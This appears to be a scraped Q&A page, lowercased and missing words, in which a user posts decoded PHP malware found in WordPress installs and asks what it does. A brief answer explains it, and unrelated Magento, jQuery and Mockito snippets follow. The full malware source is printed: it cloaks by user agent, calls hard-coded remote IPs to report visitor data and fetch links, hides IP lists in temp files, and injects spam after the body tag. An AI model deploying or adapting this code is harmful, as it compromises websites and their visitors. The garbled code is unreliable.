What does this malicious PHP code found in a WordPress install do? -

-

i able decode following php script found within wordpress files. out of curiosity, can tell me code does? looks has been somehow replicated other wordpress installs on same server.

<?php   error_reporting(0);  if (!function_exists("zm5j2q0shf_pirogok")){ function zm5j2q0shf_pirogok(){ return false; }  if (!function_exists("uno_decode")){ function uno_decode($string) {     $string = base64_decode($string);     $salt="dc5p9dopbc";     $strlen = strlen($string);     $seq = "dmef5hzupq";     $gamma = "";     while (strlen($gamma)<$strlen)     {         $seq = pack("h*",sha1($gamma.$seq.$salt));         $gamma.=substr($seq,0,8);     }      return $string^$gamma; } }  if (!function_exists("get_t_dir_mass")){ function get_t_dir_mass() {  if (function_exists("sys_get_temp_dir")) {     if (@is_writeable(sys_get_temp_dir())) { $res[] = realpath(sys_get_temp_dir()); } }     if (!empty($_env["tmp"]) && @is_writeable(realpath($_env["tmp"]))) { $res[] = realpath($_env["tmp"]); }     if (!empty($_env["tmpdir"]) && @is_writeable(realpath($_env["tmpdir"]))) { $res[] = realpath( $_env["tmpdir"]); }     if (!empty($_env["temp"]) && @is_writeable(realpath($_env["temp"]))) { $res[] = realpath( $_env["temp"]); }     $tempfile=@tempnam(__file__,"");     if (@file_exists($tempfile)) {       @unlink($tempfile);     if (@is_writeable(realpath(dirname($tempfile)))) {$res[] = realpath(dirname($tempfile)); }      }     if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { $res[] = realpath(@ini_get("upload_tmp_dir")); }     if (@is_writeable(realpath(session_save_path()))) {$res[] = realpath(session_save_path()); }     if (@is_writeable(realpath(dirname(__file__)))) { $res[] = realpath(dirname(__file__)); }      return array_unique($res); } }  if (!function_exists("get_ua")){ function get_ua(){ $name = get_true_name();  foreach(get_t_dir_mass() $t){ if(file_exists($t.directory_separator.$name)){ foreach (file($t.directory_separator.$name) $tt){ $tt = uno_decode($tt); if(strpos($tt,".") === false){ $tmp = explode("|",$tt); foreach($tmp $u){ $know[] = trim($u); } } } } } if(count($know) == 0){ $know[] = "msie"; $know[] = "firefox"; $know[] = "googlebot"; } return array_unique($know); } }  if (!function_exists("get_true_name")){ function get_true_name(){ return ".backup_time"; } }  if (!function_exists("strposa")){ function strposa($haystack, $needle, $offset=0) {     if(!is_array($needle)) $needle = array($needle);     foreach($needle $query) {         if(strpos($haystack, $query, $offset) !== false) return true;     }     return false; } }  if (isset($_server["http_user_agent"])){ $ua = strtolower($_server["http_user_agent"]);  $true_ua = get_ua();  if (strposa($ua,$true_ua)){  if (!function_exists("t_dir")){ function t_dir() { if (function_exists("sys_get_temp_dir")) {     if (@is_writeable(sys_get_temp_dir())) { return realpath(sys_get_temp_dir()); } }     if (!empty($_env["tmp"]) && @is_writeable(realpath($_env["tmp"]))) { return realpath($_env["tmp"]); }     if (!empty($_env["tmpdir"]) && @is_writeable(realpath($_env["tmpdir"]))) { return realpath( $_env["tmpdir"]); }     if (!empty($_env["temp"]) && @is_writeable(realpath($_env["temp"]))) { return realpath( $_env["temp"]); }     $tempfile=@tempnam(__file__,"");     if (@file_exists($tempfile)) {       @unlink($tempfile);     if (@is_writeable(realpath(dirname($tempfile)))) {return realpath(dirname($tempfile)); }      }     if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { return realpath(@ini_get("upload_tmp_dir")); }     if (@is_writeable(realpath(session_save_path()))) { return realpath(session_save_path()); }     if (@is_writeable(realpath(dirname(__file__)))) { return realpath(dirname(__file__)); }     return null; } }  if (!function_exists("get_know_ip")){ function get_know_ip(){ $know[] = "151.236.14.86"; $know[] = "149.154.157.133"; $know[] = "37.235.54.48"; $know[] = "31.215.205.196";  $name = get_true_name();  foreach(get_t_dir_mass() $t){ if(file_exists($t.directory_separator.$name)){ foreach (file($t.directory_separator.$name) $tt){ $tt = uno_decode($tt); if(strpos($tt,".")>0){ $know[] = trim($tt); } } } } return array_unique($know); } }  if (!function_exists("save_know_ip")){ function save_know_ip($ip){ $name = get_true_name(); $content =  implode(php_eol, $ip); foreach(get_t_dir_mass() $t){ $f = fopen($t.directory_separator.$name,"w"); fputs($f,$content); fclose($f); } } }  if (!function_exists("zm5j2q0shf_get_real_ip")){ function zm5j2q0shf_get_real_ip() { $proxy_headers = array("client_ip","forwarded","forwarded_for","forwarded_for_ip","http_client_ip","http_forwarded","http_forwarded_for","http_forwarded_for_ip", "http_pc_remote_addr","http_proxy_connection","http_via", "http_x_forwarded", "http_x_forwarded_for", "http_x_forwarded_for_ip","http_x_imforwards","http_xroxy_connection","via", "x_forwarded", "x_forwarded_for"); foreach($proxy_headers $proxy_header) { if(isset($_server[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_server[$proxy_header])){return $_server[$proxy_header];} else if(stristr(",", $_server[$proxy_header]) !== false) {$proxy_header_temp = trim(array_shift(explode(",", $_server[$proxy_header])));  if(($pos_temp = stripos($proxy_header_temp, ":")) !== false) $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp);  if(preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp) )return $proxy_header_temp; } } return $_server["remote_addr"]; } }  if (!function_exists("zm5j2q0shf_get_url")){ function zm5j2q0shf_get_url(){  $url = "http://" . $_server["http_host"] . $_server["request_uri"]; if (strpos($url,"?") !== false){ $url = substr($url,0,strpos($url,"?")); } return $url; } }   if (!function_exists("zm5j2q0shf_get_contents")){ function zm5j2q0shf_get_contents($ip, $page){ if((function_exists("curl_init")) && (function_exists("curl_exec"))){     $ch = curl_init("http://" .$ip . "/" .$page);     curl_setopt($ch, curlopt_returntransfer, 1);     curl_setopt($ch, curlopt_timeout, 3);     $ult = trim(curl_exec($ch));     return $ult;     }  if (ini_get("allow_url_fopen")) {     $ult = trim(@file_get_contents("http://" .$ip . "/" .$page));     return $ult;     }     $fp = fsockopen($ip, 80, $errno, $errstr, 30);     if ($fp) {$out = "get $page http/1.0\r\n";     $out .= "host: $ip\r\n";     $out .= "connection: close\r\n\r\n";     fwrite($fp, $out);     $ret = "";     while (!feof($fp)) {$ret  .=  fgets($fp, 128);} fclose($fp); $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));} return $ult; } }  if (!function_exists("zm5j2q0shf_samui_get_links")){ function zm5j2q0shf_samui_get_links(){  $all = get_know_ip(); shuffle($all); $url = zm5j2q0shf_get_url(); $real_ip = zm5j2q0shf_get_real_ip(); $ua = strtolower($_server["http_user_agent"]); $aid = "1001"; $cod = md5($url.time()); $check = md5($cod); $ua = urlencode(strtolower($_server["http_user_agent"])); $ref = urlencode(strtolower($_server["http_referer"])); $page = "/ml.php?mother=mycompany.com&cr=1&aid=".$aid."&url=".$url."&ip=".$real_ip."&ua=".$ua."&cod=".$cod."&ref=".$ref;  foreach ($all $ip){ $tc = zm5j2q0shf_get_contents(trim($ip),$page); $pos = strpos($tc, $check); if ($pos !== false){ $proxy_list = substr($tc,0,$pos);  save_know_ip(explode("\n",$proxy_list));   $links = substr($tc,$pos+32); return $links; } } } }  if (!function_exists("zm5j2q0shf_mod_con")){ function zm5j2q0shf_mod_con($con){ if (strpos($con,"<body") !== false) { $text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>".zm5j2q0shf_samui_get_links(), $con,1);   return $text; } else {return $con;} } }   if (!function_exists("zm5j2q0shf_callback")){ function zm5j2q0shf_callback($buf){ if (headers_sent()){ if (in_array("content-encoding: gzip", headers_list())){ $tmpfname = tempnam(t_dir(), "foo");$zf = fopen($tmpfname, "w"); fputs($zf, $buf); fclose($zf); $zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = zm5j2q0shf_mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);} else {$contents = zm5j2q0shf_mod_con($buf); }} else {$contents = zm5j2q0shf_mod_con($buf);}return($contents); } }  ob_start("zm5j2q0shf_callback");  } } }  ?>

its going known parent ip's download zipped payload , store 1 of temp directories. injecting html depending on payload top of html page bellow <body>. checks new ip's can used download more bad guy code inject.


Comments

Post a Comment

Popular posts from this blog

php - Magento - Deleted Base url key -

-
i working on cleaning url: http://mydomain.com/shop/shop/deals i going through settings in configuration tab in admin panel on magento , change secure , unsecure base urls remove first base url "shop" web page read: http://mydomain.com/shop/deals so changed unsecure base urls mydomain.com/shop mydomain.com , secure 12.345.67.89/shop 12.345.67.89. wrong thing do. i cannot reload page or admin console. how access these files through ftp , change correctly there?? when make changes in admin panel changes made in database not in file. have make changes in database. 1.go database , select core_config_data table under table find web/unsecure/base_url , web/secure/base_url . make changes here. don't forget clear cache in var/cache folder
Read more

javascript - Tooltipster plugin not firing jquery function when button or any click even occur -

-
i want use tooltipster plugin click element in body show tooltip , want have close button inside tooltip close it. however use jquery click() function handle won't fired. tried solution in post. worked when tooltip triggered hover event. tooltipster plugin not firing jquery function when link in in tooltip clicked the original solution using hover in jsfiddle trigger: 'hover', instead using click show tooltip trigger: 'click', http://jsfiddle.net/bcqyl/7/ it won't fire click event in jquery block. can captured normal javascript function only. checked should code in tooltipster plugin locked , captured "click()" event inside tips when in click trigger mode. i tried other event onchange event of radio button fired when using code in original solution @evan right. tooltip doesn't exist in dom , can't bind/delegate action (even if go way $(document) after domready). if you're after close button inside of too...
Read more

java - WrongTypeOfReturnValue exception thrown when unit testing using mockito -

-
my test list<person> mylist; @test public void testisvalidperson() { mylist = new arraylist<person>(); mylist.add(new person("tom")); when(persondao.get(person)).thenreturn(mylist); when((persondao.get(person)).isempty()).thenreturn(false);//------exception thrown boolean result = service.isvalid("tom"); assertfalse(result); } method tested: public boolean isvalid(string person){ persondao = new persondao(); person personobj = new person(person); return (persondao.get(person).isempty())?false : true; } exception thrown: org.mockito.exceptions.misusing.wrongtypeofreturnvalue: boolean cannot returned get() get() should return list *** if you're unsure why you're getting above error read on. due nature of syntax above problem might occur because: 1. exception *might* occur in wrongly written multi-threaded tests. please refer mockito faq on limitations of concurrency testing. 2. sp...
Read more